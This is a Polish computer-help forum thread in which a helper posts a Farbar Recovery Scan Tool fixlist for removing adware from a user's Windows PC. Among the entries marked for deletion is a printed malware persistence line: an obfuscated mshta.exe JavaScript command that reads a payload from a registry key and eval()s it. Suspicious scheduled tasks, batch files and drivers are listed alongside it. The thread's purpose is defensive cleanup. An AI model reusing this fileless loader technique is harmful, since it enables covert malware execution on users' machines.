Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

PUP.optional i Adware.File Tour

chertis 13 Sty 2018 20:00 447 1
  • #2 13 Sty 2018 20:19
    Kolobos
    Spec od komputerów

    Wykonaj Fixlist.txt dla FRST:
    HKU\.DEFAULT\Software\Classes\8a8b7f1d: "C:\WINDOWS\system32\mshta.exe" "javascript:Wy2ipi9Zr="zvak6H";j38N=new ActiveXObject("WScript.Shell");Ht5R9i="8oW6";vrT08D=j38N.RegRead("HKCU\\software\\lqxzwsa\\aqudaex");YEV0NwSS="lWRvA54";eval(vrT08D);WmZ0K="ZPC0v6B";" <==== UWAGA
    ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    ContextMenuHandlers1: [Foxit_ConvertToPDF_Reader] -> [CC]{A94757A0-0226-426F-B4F1-4DF381C630D3} => -> Brak pliku
    ContextMenuHandlers1: [WinRAR] -> [CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} => -> Brak pliku
    ContextMenuHandlers1: [WinRAR32] -> [CC]{B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> Brak pliku
    ContextMenuHandlers3: [00avg] -> [CC]{472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    ContextMenuHandlers6: [WinRAR] -> [CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} => -> Brak pliku
    ContextMenuHandlers6: [WinRAR32] -> [CC]{B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> Brak pliku
    Task: {0FA25FB1-1B7E-47BF-868D-A6AE0E926E92} - System32\Tasks\GrOuMmoeaUWY => C:\Users\user\OIiqgAhaorQX.bat [2014-11-21] () <==== UWAGA
    Task: {40CBF3F3-0631-4880-A9A6-3487A677B66B} - System32\Tasks\RlfAVkIuOH => C:\WINDOWS\OwwNNrI.exe [2016-05-05] (Microsoft Corporation)
    Task: {4B8E6A01-2F45-47A6-A6FE-AAB13D141BCD} - System32\Tasks\{CD3736CE-9E89-448D-957F-A6A0811F7C35} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxps://ui.skype.com/ui/0/7.29.64.102/pl/abandoninstall?page=tsProgressBar
    Task: {5741BC7F-FC1C-4D46-90D5-7C03924A5A81} - System32\Tasks\OLBIREIyvAe => C:\Users\user\AppData\Roaming\eIoUEDIzmHBi.bat [2014-11-21] () <==== UWAGA
    HKU\S-1-5-21-2526505940-863762974-4231048401-1001\...\MountPoints2: {854f09f9-a19a-11e6-be98-6036dd0129cf} - "F:\Startme.exe"
    HKU\S-1-5-21-2526505940-863762974-4231048401-1001\...\MountPoints2: {87f3ea26-9c77-11e7-bedf-6036dd0129cf} - "F:\startme.exe"
    HKU\S-1-5-21-2526505940-863762974-4231048401-501\...\Run: [HydraVisionDesktopManager] => "C:\Program Files (x86)\ATI Technologies\HydraVision\HydraDM.exe"
    HKU\S-1-5-21-2526505940-863762974-4231048401-501\...\Run: [Google Update] => C:\Users\Gość\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateCore.exe [601168 2017-10-01] (Google Inc.)
    GroupPolicy: Ograniczenia <==== UWAGA
    GroupPolicy\User: Ograniczenia <==== UWAGA
    CHR HKLM-x32\...\Chrome\Extension: [mbckjcfnjmoiinpgddefodcighgikkgn] - hxxps://clients2.google.com/service/update2/crx
    S1 umbuxaae; \??\C:\WINDOWS\system32\drivers\umbuxaae.sys [X]
    S3 xhunter1; \??\C:\WINDOWS\xhunter1.sys [X]




    2018-01-13 19:42 - 2018-01-13 19:43 - 001753600 _____ (Farbar) C:\Users\user\Downloads\FRST (1).exe
    2018-01-13 19:34 - 2018-01-13 19:36 - 000000000 ____D C:\AdwCleaner
    2018-01-07 00:43 - 2018-01-07 00:47 - 000000000 ____D C:\Users\user\AppData\Local\Lite
    2018-01-07 00:42 - 2018-01-13 19:06 - 000003470 _____ C:\WINDOWS\System32\Tasks\OLBIREIyvAe
    2018-01-07 00:42 - 2018-01-13 18:19 - 000003236 _____ C:\WINDOWS\System32\Tasks\GrOuMmoeaUWY
    2018-01-07 00:42 - 2018-01-07 00:42 - 000003572 _____ C:\WINDOWS\System32\Tasks\RlfAVkIuOH
    2018-01-07 00:42 - 2016-05-05 17:37 - 000059904 _____ (Microsoft Corporation) C:\WINDOWS\OwwNNrI.exe
    2018-01-07 00:42 - 2014-11-21 05:59 - 000001247 _____ C:\Users\user\AppData\Local\ArOEOyUuITaE
    2018-01-07 00:42 - 2014-11-21 05:59 - 000001069 _____ C:\Program Files (x86)\AeOfXIUiKYW
    2018-01-07 00:42 - 2014-11-21 05:59 - 000000070 _____ C:\Users\user\OIiqgAhaorQX
    2018-01-07 00:42 - 2014-11-21 05:59 - 000000064 _____ C:\Users\user\AppData\Roaming\eIoUEDIzmHBi
    2014-11-21 05:59 - 2014-11-21 05:59 - 000000070 _____ () C:\Users\user\OIiqgAhaorQX.bat
    2018-01-07 00:42 - 2014-11-21 05:59 - 000001069 _____ () C:\Program Files (x86)\AeOfXIUiKYW
    2014-11-21 05:59 - 2014-11-21 05:59 - 000001069 _____ () C:\Program Files (x86)\AeOfXIUiKYW.bat
    2018-01-07 00:42 - 2014-11-21 06:00 - 000197120 _____ (Microsoft Corporation) C:\Program Files (x86)\Common Files\YEADUejzIoOr.exe
    2018-01-07 00:42 - 2014-11-21 05:59 - 000000064 _____ () C:\Users\user\AppData\Roaming\eIoUEDIzmHBi
    2014-11-21 05:59 - 2014-11-21 05:59 - 000000064 _____ () C:\Users\user\AppData\Roaming\eIoUEDIzmHBi.bat
    2016-05-22 18:23 - 2016-07-21 23:23 - 000000105 _____ () C:\Users\user\AppData\Roaming\WB.CFG
    2018-01-07 00:42 - 2014-11-21 05:59 - 000001247 _____ () C:\Users\user\AppData\Local\ArOEOyUuITaE
    2014-11-21 05:59 - 2014-11-21 05:59 - 000001247 _____ () C:\Users\user\AppData\Local\ArOEOyUuITaE.bat
    2017-06-15 07:02 - 2017-06-15 07:02 - 000007915 _____ () C:\Users\user\AppData\Local\Temp\1037418701.exe
    2017-06-15 07:02 - 2017-06-15 07:02 - 000007915 _____ () C:\Users\user\AppData\Local\Temp\111646063.exe
    2017-06-15 07:02 - 2017-06-15 07:02 - 000007915 _____ () C:\Users\user\AppData\Local\Temp\2867326218.exe
    2018-01-07 00:40 - 2018-01-07 00:41 - 002575544 _____ () C:\Users\user\AppData\Local\Temp\569lu3124d.exe

    1